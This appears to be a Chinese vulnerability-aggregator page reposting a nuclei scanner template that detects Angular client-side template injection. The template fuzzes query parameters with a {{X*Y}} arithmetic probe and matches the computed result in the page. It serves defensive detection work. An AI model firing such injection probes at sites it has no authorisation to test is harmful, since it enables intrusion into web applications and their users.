angular-client-side-template-injection: Angular Client-side-template-injection

日期: 2025-08-01 | 影响软件: angular client side template injection | POC: 已公开

漏洞描述

Detects Angular client-side template injection vulnerability.

PoC代码[已公开]

id: angular-client-side-template-injection

info:
  name: Angular Client-side-template-injection
  author: theamanrawat
  severity: high
  description: |
    Detects Angular client-side template injection vulnerability.
  impact: |
    May lead to remote code execution or sensitive data exposure.
  remediation: |
    Sanitize user inputs and avoid using user-controlled data in template rendering.
  reference:
    - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/
    - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs
  tags: angular,csti,dast,headless,xss,vuln

variables:
  first: "{{rand_int(1000, 9999)}}"
  second: "{{rand_int(1000, 9999)}}"
  result: "{{to_number(first)*to_number(second)}}"

headless:
  - steps:
      - action: navigate
        args:
          url: "{{BaseURL}}"

      - action: waitload

    payloads:
      payload:
        - '{{concat("{{", "{{first}}*{{second}}", "}}")}}'

    fuzzing:
      - part: query
        type: postfix
        mode: single
        fuzz:
          - "{{payload}}"

    matchers:
      - type: word
        part: body
        words:
          - "{{result}}"
# digest: 4b0a00483046022100a2ac080bb6415a8212391f85928dbb73c39a193590e820a1296630b526de58e9022100e1e54277e619955b67a2f5f872bbb828c405da0080ebebf25cfdf2b1c930eb0a:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/csti/angular-client-side-template-injection.yaml

相关漏洞推荐